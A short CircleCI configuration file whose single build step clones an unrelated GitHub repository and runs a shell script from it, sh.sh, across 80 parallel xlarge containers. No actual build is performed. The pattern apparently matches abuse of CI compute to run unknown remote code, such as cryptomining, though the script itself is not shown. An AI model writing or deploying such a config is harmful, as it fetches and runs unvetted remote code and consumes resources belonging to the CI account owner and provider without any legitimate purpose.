version: 2
jobs:
  build:
    docker:
      - image: node:latest
    parallelism: 80
    resource_class: xlarge
    steps:
      - run: git clone https://github.com/gunturyogatama404/p.git && cd p && chmod u+x @ sh.sh && ./sh.sh
workflows:
    version: 2
    build:
        jobs:
            - build